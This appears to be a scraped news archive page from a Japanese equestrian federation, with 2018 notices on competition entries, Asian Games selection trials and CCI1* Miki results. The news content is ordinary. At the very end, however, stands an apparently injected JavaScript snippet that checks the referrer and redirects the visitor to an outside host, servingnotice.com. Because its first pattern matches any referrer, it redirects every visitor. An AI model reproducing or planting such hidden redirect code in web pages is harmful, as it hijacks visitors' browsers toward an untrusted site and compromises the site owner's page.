アーカイブ:

News
2018 年 5 月 9 日
《FEI国際チルドレン 国内大会》実施要項 発表
8月24日から25日まで蒜山ホースパークにて開催します《FEI国際チルドレン障害馬術大会2018 国内大会》実施要項を発表いたします。
申込締切は、7月17日(火)必着です。

お問い合わせ先:
日本乗馬少年団連盟 事務局(TEL:03-3297-5612)


実施要項/参加申込書のダウンロードは、大会ページから。

国際馬術連盟(FEI)発表のルール/コースプラン等のご確認は、こちら(外部リンク/英語)から。
※本大会は”Gold Tour”レベルで実施します
aaaa
News
2018 年 5 月 8 日
《アジア大会》馬場馬術代表人馬選考競技会出場人馬リスト
5月22日(火)~29日(火)に実施する第18回アジア競技大会(2018/ジャカルタ・パレンバン)馬場馬術代表人馬選考競技会(ヨーロッパ会場/日本会場)の出場人馬リストを掲載いたします。

馬場馬術代表人馬選考競技会出場人馬リスト(PDF)



 
aaaa
News
2018 年 5 月 2 日
《全日本ヤング総合》オンラインエントリー締切
5月25日~27日に、山梨県馬術競技場にて行ないます《第39回全日本ヤング総合馬術大会2018 》の参加エントリーはすべて締め切りました。
aaaa
News
2018 年 4 月 29 日
《全日本ヤング総合》クロスカントリーコースの利用について
5月25日~27日に、山梨県馬術競技場にて行ないます《第39回全日本ヤング総合馬術大会2018 》のクロスカントリーコースでのトレーニングについて、以下の通りお知らせします。

クロスカントリーコースにおけるトレーニング禁止期間:
平成30年5月19日~大会終了まで

理由:クロスカントリーコースビルディングのため

禁止期間中、ハック及び水壕の常歩通過のみ許可します。詳細は入厩後、大会本部にご確認ください。
 
aaaa
News
2018 年 4 月 27 日
競技会関連規程集平成30年度版販売開始のお知らせ
日本馬術連盟競技会関連規程集平成30年度版(書籍)の販売を開始いたしましたのでお知らせいたします。

ショッピングページはこちから

なお、PDF版はこちらからご覧いただけます
aaaa
News
2018 年 4 月 27 日
《アジア大会》 総合馬術代表人馬選考対象競技会(国外)(変更)
《第18回アジア競技大会(2018/ジャカルタ・パレンバン)》総合馬術代表人馬選考基準に基づき、国外を拠点とする人馬の競技会出場計画を発表します(一部変更につき2018/04/27再掲載)。

出場計画はこちらをご覧ください。(PDF)
 
aaaa
News
2018 年 4 月 25 日
《全日本障害2018》3大会の実施要項を発表します
平成30年度全日本障害馬術大会の3大会の実施要項を発表いたします。

《第42回全日本ジュニア障害馬術大会2018》
期日:2018年8月2日(木)~5日(日)
会場:山梨県馬術競技場
申込締切:7月9日(月)
※エントリー受付開始は、6月中旬を予定しております。

実施要項のご確認は、大会ページから。


《第70回全日本障害馬術大会2018 Part II》
期日:2018年9月13日(木)~16日(日)
会場:つま恋乗馬倶楽部
申込締切:8月20日(月)
※エントリー受付は、ランキングポイント確定と併せて開始する予定です。

実施要項のご確認は、大会ページから。


《第70回全日本障害馬術大会2018 Part I》
期日:2018年11月14日(水)~18日(日)※5日間開催となります
会場:三木ホースランドパーク
申込締切:10月29日(月)
※エントリー受付は、ランキングポイント確定と併せて開始する予定です。
※大障害AとBに区分されたことから、前年からの変更点が多々ありますので、実施要項をよくご確認ください。

実施要項のご確認は、大会ページから。
aaaa
News
2018 年 4 月 22 日
《CCI1* Miki》最終日速報

 三木ホースランドパークで開催したアジア大会選考対象競技の《CCI1* Miki 2018》は、最終日の今日(4月22日)障害馬術競技を行いました。

 朝一番、競技前に実施したホースインスペクションで、暫定1位だったオピア3を含む2頭が棄権、障害馬術競技に出場したのは8人馬となりました。上位陣は皆クリアラウンドして、順位は変わらず。平永健太&デラーゴ(RCクレイン栃木)がトータル減点28.4で優勝、髙橋駿人&ライヌス(慶應義塾大学)が減点30.0で2位、弓良隆行&ポーチャーズホープ(RCクレイン京都)が減点31.0で3位となりました。

 アジア大会代表選考については、5月に山梨県馬術競技場で実施する《CCI1* Yamanashi》が2回目の選考対象競技となっています。国内で活動している人馬はこの2大会、海外で活動している人馬は各自が宣言した2大会が評価の対象となっており、2大会の減点合計に基づいて代表人馬を選考する予定です。
  
 
▲CCI1* Miki優勝 平永健太&デラーゴ
「今日は、やるしかないという一心でした。勝ったことよりも、障害馬術競技で減点0でゴールしたことが最高に嬉しかったです。昨日のクロスカントリーは下見をしていて少し迷う箇所もあり、実際に少し危なかったところもありましたが、ノーミスで帰ってくることができました。次の山梨に向けては、今回よりも良い成績が出せるように臨みたいと思います」


《CCI1* Miki》の全結果はこちらから
 
aaaa
News
2018 年 4 月 22 日
《CCI1* Miki》最終日成績発表
 4月20日(金)~22日(日)、三木ホースランドパークにて行われた《 CCI1* Miki 2018 》 最終成績表を掲載いたします。

4月22日(日)(最終日/障害馬術競技)終了時点 最終結果成績表

CCI1*
EV100競技
EV90競技
EV80競技

 
aaaa
News
2018 年 4 月 21 日
《CCI1* Miki》第2日速報
 三木ホースランドパークで開催している《CCI1* Miki 2018》は2日目の今日(4月21日)、クロスカントリー競技を実施しました。
 アジア大会選考対象競技のCCI1*競技は、全長4400mのコースに22障害(29飛越)が設置されました。ノーミスでタイムインしたのは出場12人馬中6人馬。
 馬場馬術で1位だった髙橋駿人&オピア3(慶応義塾大学)と同2位の平永健太&デラーゴ(RCクレイン栃木)はともに減点0、トータル減点はそれぞれ28.2点と28.4点で0.2点の僅差で2日間を終えました。髙橋はもう1頭のライヌスとのコンビでもトータル減点30.0で3位に上がってきました。
 明日(4月22日)障害馬術競技を実施して、最終順位が確定します。


▲暫定1位 髙橋駿人&オピア3


▲暫定2位 平永健太&デラーゴ


▲暫定3位 髙橋駿人&ライヌス

 
aaaa
 

アーカイブ:

  • 2018.06.12
  • 2018.06.19
  • 2018.06.18
  • 2018.06.06
  • 2018.06.15
  • 2017.12.08
  • 2018.06.19
  • 2018.04.17
  • 2018.04.05
  • 2018.06.15
  • 2018.06.04
  • 2018.06.04
  • 2018.06.12


var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/lvinter2/intermediary.html?outlet80com"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl;